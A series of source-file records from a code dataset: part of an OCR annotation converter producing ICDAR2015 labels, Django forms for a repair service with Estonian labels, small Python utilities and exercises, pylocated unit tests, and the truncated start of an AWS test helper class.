cv2.polylines(img_color, [transformed_points_int], isClosed=True, color=(\n 0, 0, 255), thickness=2) # 画转换后的点\n\n\n cv2.polylines(img_color_origin, [points], isClosed=True, color=(\n random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)), thickness=2) # 画转换前的点\n\n \n\n # cv2.imshow(\"orgin\", img_color_origin)\n # cv2.waitKey(0)\n\n\n\n\n # 四个角的位置 # 左上、右上、右下、左下,当NeedRotate为true时,如果最外层的angle不为0,需要按照angle矫正图片后,坐标才准确\n pos = jo[\"pos\"]\n x = int(pos[0][\"x\"]) # 左上\n y = int(pos[0][\"y\"])\n\n x2 = int(pos[2][\"x\"]) # 右下\n y2 = int(pos[2][\"y\"])\n\n lu = [pos[0]['x'], pos[0]['y']] # left up 四个角顺时针方向数\n ru = [pos[1]['x'], pos[1]['y']]\n rd = [pos[2]['x'], pos[2]['y']]\n ld = [pos[3]['x'], pos[3]['y']]\n\n # 生成 icdar2015 格式的人工标记训练数据(用于训练 mmocr)\n #gt_txt_list.append( \"{},{},{},{},{},{},{},{},{}\".format(lu[0], lu[1], ru[0], ru[1], rd[0], rd[1], ld[0], ld[1], word) )\n\n # 绘制矩形\n start_point = (x, y) # 矩形的左上角\n\n end_point = (x2, y2) # 矩形的右下角\n\n color = (0, 0, 255) # BGR\n\n thickness = 2\n\n # 逐行画框\n # img_color = cv2.rectangle(img_color, start_point, end_point, color, thickness)\n # cv2.imshow(\"box\", img_color)\n\n # cv2.waitKey(0)\n\n points = [ lu, ru, rd, ld ]\n\n\n\n points0 = np.array([[word_x, word_y], # 左上\n # 右上\n [word_x + word_width, word_y],\n [word_x + word_width, word_y + \\\n word_height], # 右下\n [word_x, word_y + word_height], # 左下\n ])\n points1 = np.array( [ lu, ru, rd, ld ] )\n\n\n if not (abs(angle) == 90 or abs(angle) == 270) and angle != 0:\n points = transform( points, M )\n else:\n points = np.array(points)\n\n ps3 = np.array( \n [\n [min( points[0][0], points1[0][0] ), min( points[0][1], points1[0][1] )], # 左上(取最两者中最小的)\n\n [max( points[1][0], points1[1][0] ), min( points[1][1], points1[1][1] )], # 右上\n\n [max( points[2][0], points1[2][0] ), max( points[2][1], points1[2][1] )], # 右下\n\n [min( points[3][0], points1[3][0] ), max( points[3][1], points1[3][1] )] # 左下\n ]\n )\n\n img_cuted = cutPoly(img, ps3)\n cv2.imwrite(f'./tmp/{g_count}.jpg', img_cuted)\n with open(f'./tmp/{g_count}.txt', 'w', encoding='utf-8') as f:\n\t f.write(word)\n g_count += 1\n\n cv2.polylines(img_color, [points], 
isClosed=True, color=( # 多边形,框得比较全\n 100, 0, 255), thickness=2) # 只画线,不填充\n\n\n cv2.polylines(img_color_origin, [ points1 ], isClosed=True, color=(\n random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)), thickness=2) # 画转换前的点\n\n cv2.imshow(\"orgin\", img_color_origin)\n cv2.waitKey(0)\n\n # cv2.imshow(\"box\", img_color)\n # cv2.waitKey(0)\n\n # img_color = cv2.rectangle(img_color, points[0], points[2], color, thickness) # 正常矩形,框不完全\n # cv2.imshow(\"box\", img_color)\n\n # cv2.waitKey(0)\n\n\n\n\n\n if not (abs(angle) == 90 or abs(angle) == 270) and angle != 0:\n\n t = word\n ps = np.array( \n [\n [min( transformed_points_int[0][0], points[0][0] ), min( transformed_points_int[0][1], points[0][1] )], # 左上(取最两者中最小的)\n\n [max( transformed_points_int[1][0], points[1][0] ), min( transformed_points_int[1][1], points[1][1] )], # 右上\n\n [max( transformed_points_int[2][0], points[2][0] ), max( transformed_points_int[2][1], points[2][1] )], # 右下\n\n [min( transformed_points_int[3][0], points[3][0] ), max( transformed_points_int[3][1], points[3][1] )] # 左下\n ]\n )\n\n\n ps2 = np.array( \n [\n [min( points0[0][0], points1[0][0] ), min( points0[0][1], points1[0][1] )], # 左上(取最两者中最小的)\n\n [max( points0[1][0], points1[1][0] ), min( points0[1][1], points1[1][1] )], # 右上\n\n [max( points0[2][0], points1[2][0] ), max( points0[2][1], points1[2][1] )], # 右下\n\n [min( points0[3][0], points1[3][0] ), max( points0[3][1], points1[3][1] )] # 左下\n ]\n )\n\n # img_cuted = cutPoly(img_color_transform, ps)\n # cv2.imwrite(f'./tmp/{g_count}.jpg', img_cuted)\n\n # with open(f'./tmp/{g_count}.txt', 'w', encoding='utf-8') as f:\n\t # f.write(word)\n \n # g_count += 1\n\n cv2.polylines(img_color, [ ps ], isClosed=True, color=(\n 255, 0, 0), thickness=2) # 只画线,不填充\n\n cv2.polylines(img_color_origin, [ ps2 ], isClosed=True, color=(\n random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)), thickness=2) # 只画线,不填充\n \n cv2.imshow(\"orgin\", img_color_origin)\n cv2.waitKey(0)\n\n img_cuted = cutPoly(img, ps2)\n cv2.imwrite(f'./tmp/{g_count}.jpg', img_cuted)\n\n with open(f'./tmp/{g_count}.txt', 'w', encoding='utf-8') as f:\n\t f.write(word)\n\n g_count += 1\n\n\n # cv2.imshow(\"box\", img_color)\n\n # cv2.waitKey(0)\n\n lastx_mini = 0 # 下一个字符x 坐标的下界(肯定不小于这个值)\n prew = 0 # 上一个字符的宽度\n words = \"\"\n charInfo = jo[\"charInfo\"]\n\n min_cx = 9999 # 最小左上角\n min_cy = 9999\n\n max_cxcw = -1 # 最大右下角\n max_cych = -1\n\n for i in range(len(charInfo)):\n joc = charInfo[i]\n c = joc[\"word\"]\n cx = int(joc[\"x\"])\n cy = int(joc[\"y\"])\n cw = int(joc[\"w\"])\n ch = int(joc[\"h\"])\n\n if cx < min_cx:\n min_cx = cx\n if cy < min_cy:\n min_cy = cy\n\n if cx + cw > max_cxcw:\n max_cxcw = cx + cw\n\n if cy + ch > max_cych:\n max_cych = cy + ch\n\n # 绘制矩形\n start_point = (cx, cy) # 矩形的左上角\n\n end_point = (cx + cw, cy + ch) # 矩形的右下角\n\n color = (0, 0, 255) # BGR\n\n thickness = 2\n\n # 逐字画框\n # img_color = cv2.rectangle(\n # img_color, start_point, end_point, color, thickness)\n # cv2.imshow(\"box\", img_color)\n # cv2.waitKey(0)\n\n # 这个框更准一些\n # img_color = cv2.rectangle(\n # img_color, (min_cx, min_cy), (max_cxcw, max_cych), (0, 255, 0), thickness)\n # cv2.imshow(\"box\", img_color)\n # cv2.waitKey(0)\n\n # fix me: 如果上面的行框的左边要比这里更左,那就以行框的左边为准\n # 因为发现单个字的框会有漏字的现想\n\n gt_txt_list.append(\"{},{},{},{},{},{},{},{},{}\".format(\n min_cx, min_cy, max_cxcw, min_cy, max_cxcw, max_cych, min_cx, max_cych, word))\n\n gt_txt = '\\n'.join(gt_txt_list)\n\n with open(img_gt_path, \"w\", encoding='utf-8-sig') as fp:\n 
fp.write(gt_txt)\n","sub_path":"lang/programming/pytorch/文本检测/DBNET/dbnet_aliocr/icdar2015_aliocr_convert_v3.py","file_name":"icdar2015_aliocr_convert_v3.py","file_ext":"py","file_size_in_byte":20889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
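+# Standalone sketch of the point-remapping idea the converter above relies on:
+# the same 2x3 affine matrix that cv2.warpAffine applies to pixels can be
+# applied to coordinates by appending a homogeneous 1 to each point. The
+# center, angle, and points are arbitrary example values.
+import cv2
+import numpy as np
+
+M = cv2.getRotationMatrix2D((100, 100), 30, 1.0)         # center, angle, scale
+pts = np.array([[50, 50], [150, 50]], dtype=np.float64)  # points to follow
+ones = np.ones((len(pts), 1))
+moved = M.dot(np.hstack([pts, ones]).T).T                # rotated coordinates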
+{"seq_id":"498501947","text":"from django import forms\nfrom django.forms import ModelForm\nfrom repair.models import Device, ServiceOrder, Person, Enterprise, ServiceRequest, ServicePart, ServiceDevice, ServiceOrder, ServiceAction, ServiceType, ServiceRequestStatusType\nfrom django.core.exceptions import ValidationError\nfrom repair.models import UserAccount\n\nclass ServiceTypeForm(forms.Form):\n\tservice_type = forms.ChoiceField(label='Vali töö tüüp',choices=[(t.service_type, t.type_name) for t in ServiceType.objects.all()])\n\ndef isNumber(s):\n\ttry:\n\t\tfloat(s)\n\t\treturn True\n\texcept ValueError:\n\t\tpass\n\t\t\n\ttry:\n\t\timport unicodedata\n\t\tunicodedata.numeric(s)\n\t\treturn True\n\t\t\n\texcept (TypeError, ValueError):\n\t\tpass\n\t\n\treturn False\n\t\nclass DeviceSelectForm(forms.Form):\n\tdevice_choices = forms.CharField(label='Vali seade')\n\tdef __init__(self, *args, **kwargs):\n\t\torderId = kwargs.pop('id')\n\t\tsuper(DeviceSelectForm, self).__init__(*args, **kwargs)\n\t\tself.fields['device_choices'] = forms.ChoiceField(label='Vali seade', required=False, choices=[('','---------')] + [(d.service_device, d.device_fk.name + \" \" + d.device_fk.reg_no) for d in ServiceDevice.objects.filter(service_order_fk = ServiceOrder.objects.get(pk = orderId))])\n\t\t\nclass OrderPartNewForm(ModelForm):\n\tclass Meta:\n\t\tmodel = ServicePart\n\t\tfields = ['part_name', 'serial_no', 'part_count', 'part_price',]\n\t\tlabels = {\n\t\t\t'part_name': ('Nimi'),\n\t\t\t'serial_no': ('Registreerimisnumber'),\n\t\t\t'part_count': ('Arv'),\n\t\t\t'part_price': ('Hind'),\n }\n\t\t\n\tdef clean_part_price(self):\n\t\tprice = self.cleaned_data.get('part_price')\n\t\tif isNumber(price) == False:\n\t\t\traise ValidationError(\n\t\t\t\t\"Hind peab olema number.\"\n\t\t\t)\n\t\telif isNumber(price) == True:\n\t\t\tpriceDecimal = float(price)\n\t\t\tif priceDecimal < 0 :\n\t\t\t\traise ValidationError(\n\t\t\t\t\t\"Hind peab olema positiivne arv.\"\n\t\t\t\t)\n\t\t\telif priceDecimal >= 0:\n\t\t\t\tpriceDecimalString = str(priceDecimal)\n\t\t\t\tdecimalPlaces = priceDecimalString[::-1].find('.')\n\t\t\t\tif decimalPlaces > 2:\n\t\t\t\t\traise ValidationError(\n\t\t\t\t\t\t\"Hinnas peab peale koma olema maksimaalselt 2 numbrit.\"\n\t\t\t\t\t)\n\t\treturn price\n\t\t\n\t\n\tdef clean_part_count(self):\n\t\tcount = self.cleaned_data.get('part_count')\n\t\tregNo = self.cleaned_data.get('serial_no')\n\t\tif regNo != \"\" and count != 1:\n\t\t\traise ValidationError(\n\t\t\t\t\"Kui registreerimisnumber on märgitud, peab ühikute arv olema 1.\"\n\t\t\t)\n\t\treturn count\n\t\t\nclass OrderPartNewPriceDisabledForm(ModelForm):\n\tclass Meta:\n\t\tmodel = ServicePart\n\t\tfields = ['part_name', 'serial_no', 'part_count', 'part_price',]\n\t\tlabels = {\n\t\t\t'part_name': ('Nimi'),\n\t\t\t'serial_no': ('Registreerimisnumber'),\n\t\t\t'part_count': ('Arv'),\n\t\t\t'part_price': ('Hind'),\n }\n\t\t\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(OrderPartNewPriceDisabledForm, self).__init__(*args, **kwargs)\n\t\tself.fields['part_price'].widget.attrs['disabled'] = 'disabled'\n\t\t\t\n\t\t\n\t\t\n\t\t\n\n\t\t\n\t\t\n\t\t\n\nclass OrderWorkNewForm(ModelForm):\n\tclass Meta:\n\t\tmodel = ServiceAction\n\t\tfields = ['service_amount', 'price', 'action_description',]\n\t\tlabels = {\n\t\t\t'service_amount': ('Maht'),\n\t\t\t'price': ('Hind'),\n\t\t\t'action_description': ('Kirjeldus'),\n }\n\t\terror_messages = {\n 'service_amount': {\n 'required': (\"See väli on kohustuslik.\"),\n },\n\t\t\t'price': {\n 
'required': (\"See väli on kohustuslik.\"),\n },\n }\n\t\t\n\tdef clean_price(self):\n\t\tprice = self.cleaned_data.get('price')\n\t\tif isNumber(price) == False:\n\t\t\traise ValidationError(\n\t\t\t\t\"Hind peab olema arv.\"\n\t\t\t)\n\t\telif isNumber(price) == True:\n\t\t\tpriceDecimal = float(price)\n\t\t\tif priceDecimal < 0 :\n\t\t\t\traise ValidationError(\n\t\t\t\t\t\"Hind peab olema positiivne arv.\"\n\t\t\t\t)\n\t\t\telif priceDecimal >= 0:\n\t\t\t\tpriceDecimalString = str(priceDecimal)\n\t\t\t\tdecimalPlaces = priceDecimalString[::-1].find('.')\n\t\t\t\tif decimalPlaces > 2:\n\t\t\t\t\traise ValidationError(\n\t\t\t\t\t\t\"Hinnas peab peale koma olema maksimaalselt 2 numbrit.\"\n\t\t\t\t\t)\n\t\treturn price\n\t\t\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(OrderWorkNewForm, self).__init__(*args, **kwargs)\n\t\tself.fields['service_amount'].required = True\n\t\tself.fields['price'].required = True\n\t\t\nclass DeviceNewForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Device\n\t\tfields = ['name', 'model', 'description', 'manufacturer', 'reg_no', 'device_type_fk']\n\t\tlabels = {\n\t\t\t'name': ('Nimi*'),\n\t\t\t'model': ('Mudel*'),\n\t\t\t'description': ('Kommentaar'),\n\t\t\t'manufacturer': ('Tootja*'),\n\t\t\t'reg_no': ('Registreerimisnr.*'),\n\t\t\t'device_type_fk': ('Tüüp*'),\n }\n\t\t\nclass DeviceSearchFormDeviceProperties(ModelForm):\n\tclass Meta:\n\t\tmodel = Device\n\t\texclude = ['model', 'description', 'manufacturer', 'reg_no', 'device_type_fk']\n\t\t\nclass RequestsSearchFormByCustomerName(forms.Form):\n\tname = forms.CharField(label='Kliendi nimi', max_length=25,required=False)\n\torder_price_min = forms.CharField(label='Tellimuse hinna alampiir', max_length=25,required=False)\n\torder_price_max = forms.CharField(label='Tellimuse hinna ülempiir', max_length=25,required=False)\n\tdeviceName = forms.CharField(label='Seotud seade', max_length=25,required=False)\n\t\n\tdef clean_order_price_min(self):\n\t\tpriceMin = self.cleaned_data.get('order_price_min')\n\t\tif isNumber(priceMin) == False:\n\t\t\traise ValidationError(\n\t\t\t\t\"Hind peab olema arv.\"\n\t\t\t)\n\t\telif isNumber(priceMin) == True:\n\t\t\tpriceMinDecimal = float(priceMin)\n\t\t\tif priceMinDecimal < 0 :\n\t\t\t\traise ValidationError(\n\t\t\t\t\t\"Hind peab olema positiivne arv.\"\n\t\t\t\t)\n\t\t\telif priceMinDecimal >= 0:\n\t\t\t\tpriceMinDecimalString = str(priceMinDecimal)\n\t\t\t\tdecimalPlaces = priceMinDecimalString[::-1].find('.')\n\t\t\t\tif decimalPlaces > 2:\n\t\t\t\t\traise ValidationError(\n\t\t\t\t\t\t\"Hinnas peab peale koma olema maksimaalselt 2 numbrit.\"\n\t\t\t\t\t)\n\t\treturn priceMin\n\t\n\tdef clean_order_price_max(self):\n\t\tpriceMax = self.cleaned_data.get('order_price_max')\n\t\tif isNumber(priceMax) == False:\n\t\t\traise ValidationError(\n\t\t\t\t\"Hind peab olema arv.\"\n\t\t\t)\n\t\telif isNumber(priceMax) == True:\n\t\t\tpriceMaxDecimal = float(priceMax)\n\t\t\tif priceMaxDecimal < 0 :\n\t\t\t\traise ValidationError(\n\t\t\t\t\t\"Hind peab olema positiivne number.\"\n\t\t\t\t)\n\t\t\telif priceMaxDecimal >= 0:\n\t\t\t\tpriceMaxDecimalString = str(priceMaxDecimal)\n\t\t\t\tdecimalPlaces = priceMaxDecimalString[::-1].find('.')\n\t\t\t\tif decimalPlaces > 2:\n\t\t\t\t\traise ValidationError(\n\t\t\t\t\t\t\"Hinnas peab peale koma olema maksimaalselt 2 numbrit.\"\n\t\t\t\t\t)\n\t\treturn priceMax\n\t\t\nclass ServiceOrderForm(ModelForm):\n\tTYPE_CHOICES = ((1, 'Too vastu voetud',), (2, 'Valmis',), (3, 'Hinnastatud',), (4, 'Arve tehtud',), (5, 'Seade 
tagastatud',))\n\tso_status_type_fk = forms.ChoiceField(label='Staatus', required=True, widget=forms.Select, choices=TYPE_CHOICES)\n\tclass Meta:\n\t\tmodel = ServiceOrder\n\t\tfields = ['service_order', 'so_status_type_fk', 'note']\n\t\tlabels = {\n\t\t\t'note': ('Märkused'),\n }\n\t\twidgets = {\n\t\t\t'service_order': forms.HiddenInput(),\n\t\t}\n\t\t\nclass PersonForm(ModelForm):\n\tperson_choices = forms.ChoiceField(label='Kliendi nimi',choices=[(p.person, p.first_name + \" \" + p.last_name) for p in Person.objects.all()])\n\tclass Meta:\n\t\tmodel = Person\n\t\tfields = ('person', )\n\t\twidgets = {\n\t\t\t'person_choices': forms.Select(attrs={'class': 'select', 'id': 'person'}),\n\t\t}\n\t\t\nclass EnterpriseForm(ModelForm):\n\tenterprise_choices = forms.ChoiceField(label='Kliendi nimi',choices=[(e.enterprise, e.full_name) for e in Enterprise.objects.all()])\n\tclass Meta:\n\t\tmodel = Enterprise\n\t\tfields = ('enterprise', )\n\t\twidgets = {\n\t\t\t'person_choices': forms.Select(attrs={'class': 'select', 'id': 'enterprise'}),\n\t\t}\n\nclass CustomerTypeChoiceForm(forms.Form):\n\tSUBJECT_TYPE_CHOICES = ((1, 'Eraisikud',), (2, 'Ettevotted',),)\n\tsubject_type = forms.ChoiceField(label='Kliendi tüüp', required=True, widget=forms.RadioSelect(attrs={'class': 'radio', 'id': 'customer_type', 'onclick': 'checkCustomerTwo()'}), choices=SUBJECT_TYPE_CHOICES)\n\t\nclass ServiceRequestForm(ModelForm):\n\tclass Meta:\n\t\tmodel = ServiceRequest\n\t\tfields = ['service_desc_by_customer', 'service_desc_by_employee']\n\t\tlabels = {\n\t\t\t'service_desc_by_customer': ('Kliendi kommentaar'),\n\t\t\t'service_desc_by_employee': ('Töötaja kommentaar'),\n }\n\t\t\nclass DevicePresentForm(ModelForm):\n\tclass Meta:\n\t\tmodel = Device\n\t\tfields = ['name', 'manufacturer', 'device_type_fk']\n\t\tlabels = {\n\t\t\t'name': ('Seadme nimi'),\n\t\t\t'manufacturer': ('Tootja'),\n\t\t\t'device_type_fk': ('Seadme tüüp'),\n }\n\t\nclass PersonsSearchForm(forms.Form):\n\tfirst_name = forms.CharField(label='Eesnimi', max_length=25, required = False)\n\tlast_name = forms.CharField(label='Perekonnanimi', max_length=25, required = False)\n\tid_code = forms.CharField(label='Isikukood', max_length=25, required = False)\n\tbirth_year = forms.CharField(label='Sünniaasta', max_length=4, required = False)\n\tdef clean_birth_year(self):\n\t\tyear= self.cleaned_data.get('birth_year')\n\t\tif year != \"\":\n\t\t\tif isNumber(year) == False:\n\t\t\t\traise ValidationError(\n\t\t\t\t\t\"Aasta peab koosnema numbritest.\"\n\t\t\t\t)\n\t\t\telif isNumber(year) == True:\n\t\t\t\tyearInteger = int(year)\n\t\t\t\tif yearInteger < 0 :\n\t\t\t\t\traise ValidationError(\n\t\t\t\t\t\t\"Hind peab olema positiivne.\"\n\t\t\t\t\t)\n\t\treturn year\n\t\t\nclass EnterprisesSearchForm(forms.Form):\n\tfull_name = forms.CharField(label='Ettevõtte nimetus', max_length=25, required = False)\n\t\nclass OrdersSearchForm(forms.Form):\n\tTYPE_CHOICES = ((\"\", '----------',), (1, 'Too vastu voetud',), (2, 'Valmis',), (3, 'Hinnastatud',), (4, 'Arve tehtud',), (5, 'Seade tagastatud',))\n\tcreated_year = forms.CharField(label='Alates aastast', max_length=4, required = False)\n\tso_status_type_fk = forms.ChoiceField(label='Staatus', required=False, widget=forms.Select, choices=TYPE_CHOICES)\n\t\t\n\tdef clean_created_year(self):\n\t\tIntegerValidator(self, 'created_year', 4, 'Aasta', 1)\n\t\t\n\tdef clean_created_month(self):\n\t\tIntegerValidator(self, 'created_month', 2, 'Kuu', 1)\n\t\t\n\tdef clean_created_day(self):\n\t\tIntegerValidator(self, 
'created_day', 2, 'Kuupäev', 1)\n\t\t\ndef IntegerValidator(self, field_name, length, message, minValue):\n\tparam = self.cleaned_data.get(field_name)\n\tif param != \"\":\n\t\tif isNumber(param) == False:\n\t\t\traise ValidationError(\n\t\t\t\tmessage + \" peab koosnema ainult numbritest.\"\n\t\t\t)\n\t\telif isNumber(param) == True:\n\t\t\tparamInteger = int(param)\n\t\t\tif paramInteger < minValue :\n\t\t\t\traise ValidationError(\n\t\t\t\t\tmessage + \" peab olema suurem või võrdne \" + str(minValue) + \".\"\n\t\t\t\t)\n\treturn param\n\t\n\n# class RegisterForm(forms.Form):\n\t# username = forms.CharField(widget=forms.TextInput,label=\"Kasutajanimi\")\n\t# password1 = forms.CharField(widget=forms.PasswordInput,label=\"Salasona\")\n\t# password2 = forms.CharField(widget=forms.PasswordInput,label=\"Salasona(veel kord)\")\n\t# firstName = forms.CharField(label='Eesnimi',widget=forms.TextInput)\n\t# lastName = forms.CharField(label='Perekonnanimi', widget=forms.TextInput)\n\t# iCode = forms.CharField(label='Isikukood', widget=forms.TextInput)\n\t\t\n\t# def clean(self):\n\t\t# cleaned_data = super(RegisterForm, self).clean()\n\t\t# if 'password1' in self.cleaned_data and 'password2' in self.cleaned_data:\n\t\t\t# if self.cleaned_data['password1'] != self.cleaned_data['password2']:\n\t\t\t\t# raise forms.ValidationError(\"Sisestatud salasõnad ei lange kokku. Proovi uuesti.\")\n\t\t# return self.cleaned_data\n\t\t\n# class AuthenticationForm(forms.Form):\n\t# username = forms.EmailField(widget=forms.TextInput)\n\t# password = forms.CharField(widget=forms.PasswordInput)\n\t\n\t# class Meta:\n\t\t# model = UserAccount\n\t\t# fields = ['email', 'password']\n\t\t# labels = {\n\t\t\t# 'username': ('Kasutajanimi'),\n\t\t\t# 'password': ('Salasõna'),\n\t\t# }","sub_path":"praktikatoo/mysite/repair/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":11408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
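The price fields in the forms above repeat the same isNumber/float/decimal-place checks in several clean_* methods. A minimal sketch of the shorter built-in route, assuming Django's forms.DecimalField fits the model: it enforces "is a number", "non-negative" and "at most 2 decimal places" declaratively (the max_digits bound and field name are illustrative, not from the original):

from django import forms

class PriceSearchForm(forms.Form):
    # One declaration replaces the manual clean_price-style validation.
    price = forms.DecimalField(
        required=False,
        min_value=0,
        max_digits=12,       # assumed upper bound, not taken from the original
        decimal_places=2,
        error_messages={
            'invalid': "Hind peab olema arv.",
            'min_value': "Hind peab olema positiivne arv.",
            'max_decimal_places': "Hinnas peab peale koma olema maksimaalselt 2 numbrit.",
        },
    )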
+{"seq_id":"19132080","text":"import builtins\nimport hashlib\n\n\nclass open:\n def __init__(self, path, hashvalue, algorithm, mode='t', encoding='utf8'):\n self.path = path\n self.hashvalue = hashvalue\n if isinstance(algorithm, str):\n self._m = hashlib.new(algorithm)\n else:\n self._m = algorithm\n self._isbinary = 'b' in mode\n self._encoding = encoding\n\n def __enter__(self):\n self._f = builtins.open(self.path, 'br')\n return self\n\n def read(self, size=-1):\n b = self._f.read(size)\n self._m.update(b)\n if self._isbinary:\n return b\n else:\n return b.decode(self._encoding)\n\n def __iter__(self):\n return self.read().splitlines().__iter__()\n\n def __exit__(self, exc_type, exc_value, traceback):\n if exc_type is None and self._m.hexdigest() != self.hashvalue:\n raise ValueError('digest mismatch')\n self._f.close()\n\n\ndef read_list(path):\n with builtins.open(path) as f:\n for line in f:\n pos = line.find(' ')\n filehash = line[:pos]\n filepath = line[pos+2:-1]\n yield filehash, filepath\n","sub_path":"hashfiles.py","file_name":"hashfiles.py","file_ext":"py","file_size_in_byte":1173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"371638155","text":"import string\n\ndef str_rev_alpha(s):\n alpha_indices = [ind for ind, char in enumerate(s) \n if char in string.ascii_lowercase]\n l_alpha = len(alpha_indices)\n s = list(s)\n for i in range(l_alpha // 2):\n s[alpha_indices[i]], s[alpha_indices[l_alpha - i - 1]] = s[alpha_indices[l_alpha - i - 1]], s[alpha_indices[i]]\n return ''.join(s) \n\ndef str_rev(s):\n lo, hi = 0, len(s) - 1\n s = list(s)\n while lo < hi:\n if s[lo] not in string.ascii_letters:\n lo += 1\n elif s[hi] not in string.ascii_letters:\n hi -= 1\n else:\n s[lo], s[hi] = s[hi], s[lo]\n lo += 1\n hi -= 1\n return ''.join(s)\n\nif __name__ == '__main__':\n s = input()\n print(s[::-1])\n print(str_rev_alpha(s))\n","sub_path":"Python/Datastructures&Algorithms_Python/string_reverse.py","file_name":"string_reverse.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"599023932","text":"import unittest, os, shutil\nimport logging\nimport getpass\n\nfrom pylocated import locatedb, PyLocatedException\n\nlogging.basicConfig(level=logging.INFO)\n\nlog = logging.getLogger(__name__)\n\n\nclass TestLocate(unittest.TestCase):\n\n\n def test_version(self):\n version = locatedb.version()\n log.info(version)\n self.assertIsNotNone(version)\n\n def test_find(self):\n buffer = locatedb.find('fstab', ignore_case=False, limit=2)\n str_list = buffer.getvalue().split(\"\\n\")\n log.info(str_list)\n self.assertEqual(len(str_list), 2)\n\n def test_find_regex(self):\n buffer = locatedb.find('py', ignore_case=False, regex='.*\\.py')\n str_list = buffer.getvalue().split(\"\\n\")\n self.assertIsNotNone(str_list)\n\n def test_statistics(self):\n file_obj = locatedb.statistics()\n log.info(file_obj.__dict__)\n self.assertIsNotNone(file_obj.directories)\n self.assertIsNotNone(file_obj.files)\n self.assertIsNotNone(file_obj.totalspace)\n self.assertIsNotNone(file_obj.usedspace)\n\n def test_instance_find(self):\n locate_obj = locatedb()\n buffer = locate_obj.find('fstab', ignore_case=False, limit=2)\n str_list = buffer.getvalue().split(\"\\n\")\n log.info(str_list)\n self.assertEqual(len(str_list), 2)\n\n def test_instance_count(self):\n locate_obj = locatedb()\n buffer = locate_obj.count('fstab')\n log.info(buffer)\n self.assertIsNotNone(buffer)\n\nclass TestLocateWithKwArgs(unittest.TestCase):\n\n def __init__(self, *args, **kwargs):\n super(TestLocateWithKwArgs, self).__init__(*args, **kwargs)\n self.test_file = '/tmp/db123.db'\n\n def setUp(self):\n if os.path.isfile(self.test_file):\n os.unlink(self.test_file)\n elif os.path.isdir(self.test_file):\n shutil.rmtree(self.test_file)\n else:\n pass\n\n def tearDown(self):\n if os.path.isfile(self.test_file):\n os.unlink(self.test_file)\n\n def create_obj(self):\n locate_obj = locatedb(db_path=self.test_file)\n\n def test_instance_with_dbpath(self):\n if getpass.getuser() == 'root':\n self.create_obj()\n self.assertEqual(os.path.isfile(self.test_file), True, \"instance triggered updatedb\")\n else:\n self.assertRaises(PyLocatedException, self.create_obj)\n","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"84622907","text":"#!/usr/bin/python\n\nvaleur1 = int(input(\"Entrez une première valeur : \"))\nvaleur2 = int(input(\"Entrez une seconde valeur : \"))\nprint(\"Valeur 1 : {} - Valeur 2 : {}\".format(valeur1, valeur2))\n\nvaleur_temporaire = valeur2\nvaleur2 = valeur1\nvaleur1 = valeur_temporaire\nprint(\"Valeur 1 : {} - Valeur 2 : {}\".format(valeur1, valeur2))\n","sub_path":"exercices/serie1/ex6.py","file_name":"ex6.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"209865067","text":"#! /usr/bin/python\n\nimport os\nfrom autopilot.common.sshutils import SSHClient\nfrom autopilot.common.asyncpool import taskpool\nfrom autopilot.inf.aws.awsinf import AWSInf\nfrom autopilot.inf.aws import awsutils\nfrom autopilot.test.common.aptest import APtest\n\n\nclass AWStest(APtest):\n \"\"\"\n AWS tests base class\n \"\"\"\n def get_aws_inf(self):\n aws_access_key = os.environ[\"AWS_ACCESS_KEY\"]\n aws_secret_key = os.environ[\"AWS_SECRET_KEY\"]\n return AWSInf(aws_access_key=aws_access_key,\n aws_secret_key=aws_secret_key)\n\n def delete_vpc_subnets(self, spec=None):\n vpc = self. _get_vpc()\n # disassociate all subnets and subnet related resources\n subnets = spec.get(\"subnets\", [])\n if subnets:\n for subnet in subnets:\n sid = subnet.get(\"subnet_id\")\n raid = subnet.get(\"route_association_id\")\n rtid = subnet.get(\"route_table_id\")\n\n self.log(\"Deleting resources for subnet: {0}\".format(sid))\n if raid:\n self.log(\"Disassociate route {0} for subnet: {1}\".format(raid, sid))\n vpc.conn.disassociate_route_table(association_id=raid)\n if rtid:\n self.log(\"Delete route {0} for subnet: {1}\".format(rtid, sid))\n vpc.conn.delete_route_table(route_table_id=rtid)\n\n self.log(\"Deleting subnet: {0}\".format(sid))\n vpc.conn.delete_subnet(subnet_id=sid)\n\n def terminate_instances_by_ids(self, instance_ids, sgids):\n self.log(\"Terminating instances: {0}\".format(instance_ids))\n ec2 = self._get_ec2()\n instances = ec2.get_all_instances(instance_ids=instance_ids)\n ec2.terminate_instances(instances=instance_ids)\n self.yield_until_instances_in_state(instances=instances, state=\"terminated\")\n self.doyield()\n for sgid in sgids:\n self.log(\"Deleting security group: {0}\".format(sgid))\n ec2.delete_group(group_id=sgid, retry_count=24)\n\n def delete_vpc(self, spec=None):\n vpc = self. 
